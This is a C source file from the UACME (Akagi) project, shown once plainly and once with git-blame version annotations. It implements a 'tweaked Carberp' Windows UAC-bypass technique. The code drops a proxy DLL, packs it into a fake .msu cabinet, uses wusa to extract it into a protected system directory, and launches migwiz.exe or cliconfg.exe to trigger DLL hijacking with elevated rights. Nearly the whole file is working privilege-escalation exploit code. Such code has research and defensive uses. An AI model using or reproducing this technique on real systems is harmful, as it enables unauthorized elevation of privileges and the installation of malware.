UACME/Source/Akagi/carberp.c

/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2014 - 2015
*
*  TITLE:       CARBERP.C
*
*  VERSION:     1.60
*
*  DATE:        20 Apr 2015
*
*  Tweaked Carberp methods.
*  Original Carberp is exploiting mcx2prov.exe in ehome.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
#include "makecab.h"

/*
* ucmWusaExtractPackage
*
* Purpose:
*
* Extract cab to protected directory using wusa.
*
*/
BOOL ucmWusaExtractPackage(
	LPWSTR lpCommandLine
	)
{
	BOOL bResult = FALSE, cond = FALSE;
	WCHAR szMsuFileName[MAX_PATH + 1];
	WCHAR szCmd[MAX_PATH * 4];

	RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));

	do {

		if (ExpandEnvironmentStringsW(T_MSUPACKAGE_NAME,
			szMsuFileName, MAX_PATH) == 0)
		{
			break;
		}

		//extract msu data to target directory
		RtlSecureZeroMemory(szCmd, sizeof(szCmd));
		wsprintfW(szCmd, lpCommandLine, szMsuFileName);
		bResult = supRunProcess(L"cmd.exe", szCmd);
		if (bResult == FALSE) {
			OutputDebugString(TEXT("[UCM] Wusa extract files failed"));
			break;
		}

	} while (cond);

	if (szMsuFileName[0] != 0) {
		DeleteFileW(szMsuFileName);
	}
	return bResult;
}

/*
* ucmWusaMethod
*
* Purpose:
*
* Build and install fake msu package then run target application.
*
*/
BOOL ucmWusaMethod(
	DWORD dwType,
	PVOID ProxyDll,
	DWORD ProxyDllSize
	)
{
	BOOL bResult = FALSE, cond = FALSE;
	LPWSTR lpSourceDll, lpCommandLine, lpTargetProcess;
	WCHAR szCmd[MAX_PATH * 4];

	if (
		(ProxyDll == NULL) ||
		(ProxyDllSize == 0)
		)
	{
		return FALSE;
	}

	switch (dwType) {

	//use migwiz.exe as target
	case METHOD_CARBERP:
		lpSourceDll = METHOD_MIGWIZ_SOURCEDLL;
		lpCommandLine = METHOD_MIGWIZ_CMDLINE;
		lpTargetProcess = METHOD_MIGWIZ_TARGETAPP;
		break;

	//use cliconfg.exe as target
	case METHOD_CARBERP_EX:
		lpSourceDll = METHOD_SQLSRV_SOURCEDLL;
		lpCommandLine = METHOD_SQLSRV_CMDLINE;
		lpTargetProcess = METHOD_SQLSRV_TARGETAPP;
		break;

	default:
		return FALSE;
	}

	do {

		//
		// Extract file to the protected directory
		// First, create cab with fake msu ext, second run fusion process.
		//
		if (!ucmCreateCabinetForSingleFile(lpSourceDll, ProxyDll, ProxyDllSize)) {
			break;
		}

		if (!ucmWusaExtractPackage(lpCommandLine)) {
			break;
		}

		//run target process for dll hijacking
		RtlSecureZeroMemory(szCmd, sizeof(szCmd));
		if (ExpandEnvironmentStringsW(lpTargetProcess,
			szCmd, MAX_PATH) == 0)
		{
			break;
		}
		bResult = supRunProcess(szCmd, NULL);

	} while (cond);


	return bResult;
}

/*
* ucmCreateCabinetForSingleFile
*
* Purpose:
*
* Build cabinet for usage in methods where required 1 file.
*
*/
BOOL ucmCreateCabinetForSingleFile(
	LPWSTR lpSourceDll,
	PVOID ProxyDll,
	DWORD ProxyDllSize
	)
{
	BOOL cond = FALSE, bResult = FALSE;
	CABDATA *Cabinet = NULL;
	WCHAR szDllFileName[MAX_PATH + 1];
	WCHAR szMsuFileName[MAX_PATH + 1];

	if (
		(ProxyDll == NULL) ||
		(ProxyDllSize == 0)
		)
	{
		return FALSE;
	}

	do {

		//drop proxy dll
		RtlSecureZeroMemory(szDllFileName, sizeof(szDllFileName));
		if (ExpandEnvironmentStringsW(lpSourceDll,
			szDllFileName, MAX_PATH) == 0)
		{
			break;
		}
		if (!supWriteBufferToFile(szDllFileName, ProxyDll, ProxyDllSize)) {
			OutputDebugString(TEXT("[UCM] Failed to drop dll"));
			break;
		}

		//build cabinet
		RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
		if (ExpandEnvironmentStringsW(T_MSUPACKAGE_NAME,
			szMsuFileName, MAX_PATH) == 0)
		{
			break;
		}
		Cabinet = cabCreate(szMsuFileName);
		if (Cabinet) {
			lpSourceDll = _filenameW(szDllFileName);
			//put file without compression
			bResult = cabAddFile(Cabinet, szDllFileName, lpSourceDll);
			cabClose(Cabinet);
		}
		else {
			OutputDebugString(TEXT("[UCM] Error creating cab archive"));
			break;
		}

	} while (cond);

	return bResult;
}
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`/*******************************************************************************`
			`*`
			`* (C) COPYRIGHT AUTHORS, 2014 - 2015`
			`*`
			`* TITLE: CARBERP.C`
			`*`
v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`* VERSION: 1.60`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`*`
v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`* DATE: 20 Apr 2015`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`*`
v 1.3.0 Win32/Carberp method tweaked again to work from Windows 7 up to Windows 10 b10041. 2015-03-30 07:03:39 +00:00			`* Tweaked Carberp methods.`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`* Original Carberp is exploiting mcx2prov.exe in ehome.`
			`*`
			`* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF`
			`* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED`
			`* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A`
			`* PARTICULAR PURPOSE.`
			`*`
			`*******************************************************************************/`
			`#include "global.h"`
v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`#include "makecab.h"`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00
			`/*`
v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`* ucmWusaExtractPackage`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`*`
			`* Purpose:`
			`*`
v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`* Extract cab to protected directory using wusa.`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`*`
			`*/`
v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`BOOL ucmWusaExtractPackage(`
			`LPWSTR lpCommandLine`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`)`
			`{`
			`BOOL bResult = FALSE, cond = FALSE;`
			`WCHAR szMsuFileName[MAX_PATH + 1];`
			`WCHAR szCmd[MAX_PATH * 4];`

			`RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));`

			`do {`

v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`if (ExpandEnvironmentStringsW(T_MSUPACKAGE_NAME,`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`szMsuFileName, MAX_PATH) == 0)`
			`{`
			`break;`
			`}`

v 1.4.0 Win32/Tilon. 2015-04-04 15:37:21 +00:00			`//extract msu data to target directory`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`RtlSecureZeroMemory(szCmd, sizeof(szCmd));`
v 1.3.0 Win32/Carberp method tweaked again to work from Windows 7 up to Windows 10 b10041. 2015-03-30 07:03:39 +00:00			`wsprintfW(szCmd, lpCommandLine, szMsuFileName);`
v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00			`bResult = supRunProcess(L"cmd.exe", szCmd);`
			`if (bResult == FALSE) {`
v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`OutputDebugString(TEXT("[UCM] Wusa extract files failed"));`
v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00			`break;`
			`}`

			`} while (cond);`

			`if (szMsuFileName[0] != 0) {`
			`DeleteFileW(szMsuFileName);`
			`}`
			`return bResult;`
			`}`

			`/*`
			`* ucmWusaMethod`
			`*`
			`* Purpose:`
			`*`
			`* Build and install fake msu package then run target application.`
			`*`
			`*/`
			`BOOL ucmWusaMethod(`
			`DWORD dwType,`
			`PVOID ProxyDll,`
			`DWORD ProxyDllSize`
			`)`
			`{`
			`BOOL bResult = FALSE, cond = FALSE;`
v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`LPWSTR lpSourceDll, lpCommandLine, lpTargetProcess;`
v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00			`WCHAR szCmd[MAX_PATH * 4];`

			`if (`
			`(ProxyDll == NULL) \|\|`
			`(ProxyDllSize == 0)`
			`)`
			`{`
			`return FALSE;`
			`}`

			`switch (dwType) {`

			`//use migwiz.exe as target`
			`case METHOD_CARBERP:`
			`lpSourceDll = METHOD_MIGWIZ_SOURCEDLL;`
			`lpCommandLine = METHOD_MIGWIZ_CMDLINE;`
			`lpTargetProcess = METHOD_MIGWIZ_TARGETAPP;`
			`break;`

			`//use cliconfg.exe as target`
			`case METHOD_CARBERP_EX:`
v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`lpSourceDll = METHOD_SQLSRV_SOURCEDLL;`
			`lpCommandLine = METHOD_SQLSRV_CMDLINE;`
			`lpTargetProcess = METHOD_SQLSRV_TARGETAPP;`
v 1.5.0 Hybrid Simda/Carberp with AppVerif added. 2015-04-05 16:28:52 +00:00			`break;`

			`default:`
			`return FALSE;`
			`}`

			`do {`

v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`//`
			`// Extract file to the protected directory`
			`// First, create cab with fake msu ext, second run fusion process.`
			`//`
			`if (!ucmCreateCabinetForSingleFile(lpSourceDll, ProxyDll, ProxyDllSize)) {`
			`break;`
			`}`

			`if (!ucmWusaExtractPackage(lpCommandLine)) {`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`break;`
			`}`

v 1.4.0 Win32/Tilon. 2015-04-04 15:37:21 +00:00			`//run target process for dll hijacking`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`RtlSecureZeroMemory(szCmd, sizeof(szCmd));`
v 1.3.0 Win32/Carberp method tweaked again to work from Windows 7 up to Windows 10 b10041. 2015-03-30 07:03:39 +00:00			`if (ExpandEnvironmentStringsW(lpTargetProcess,`
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`szCmd, MAX_PATH) == 0)`
			`{`
			`break;`
			`}`
			`bResult = supRunProcess(szCmd, NULL);`

			`} while (cond);`


v 1.6.0 Hybrid method 10 added, makecab removed. 2015-04-20 08:19:13 +00:00			`return bResult;`
			`}`

			`/*`
			`* ucmCreateCabinetForSingleFile`
			`*`
			`* Purpose:`
			`*`
			`* Build cabinet for usage in methods where required 1 file.`
			`*`
			`*/`
			`BOOL ucmCreateCabinetForSingleFile(`
			`LPWSTR lpSourceDll,`
			`PVOID ProxyDll,`
			`DWORD ProxyDllSize`
			`)`
			`{`
			`BOOL cond = FALSE, bResult = FALSE;`
			`CABDATA *Cabinet = NULL;`
			`WCHAR szDllFileName[MAX_PATH + 1];`
			`WCHAR szMsuFileName[MAX_PATH + 1];`

			`if (`
			`(ProxyDll == NULL) \|\|`
			`(ProxyDllSize == 0)`
			`)`
			`{`
			`return FALSE;`
			`}`

			`do {`

			`//drop proxy dll`
			`RtlSecureZeroMemory(szDllFileName, sizeof(szDllFileName));`
			`if (ExpandEnvironmentStringsW(lpSourceDll,`
			`szDllFileName, MAX_PATH) == 0)`
			`{`
			`break;`
			`}`
			`if (!supWriteBufferToFile(szDllFileName, ProxyDll, ProxyDllSize)) {`
			`OutputDebugString(TEXT("[UCM] Failed to drop dll"));`
			`break;`
			`}`

			`//build cabinet`
			`RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));`
			`if (ExpandEnvironmentStringsW(T_MSUPACKAGE_NAME,`
			`szMsuFileName, MAX_PATH) == 0)`
			`{`
			`break;`
			`}`
			`Cabinet = cabCreate(szMsuFileName);`
			`if (Cabinet) {`
			`lpSourceDll = _filenameW(szDllFileName);`
			`//put file without compression`
			`bResult = cabAddFile(Cabinet, szDllFileName, lpSourceDll);`
			`cabClose(Cabinet);`
			`}`
			`else {`
			`OutputDebugString(TEXT("[UCM] Error creating cab archive"));`
			`break;`
			`}`

			`} while (cond);`

v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`return bResult;`
			`}`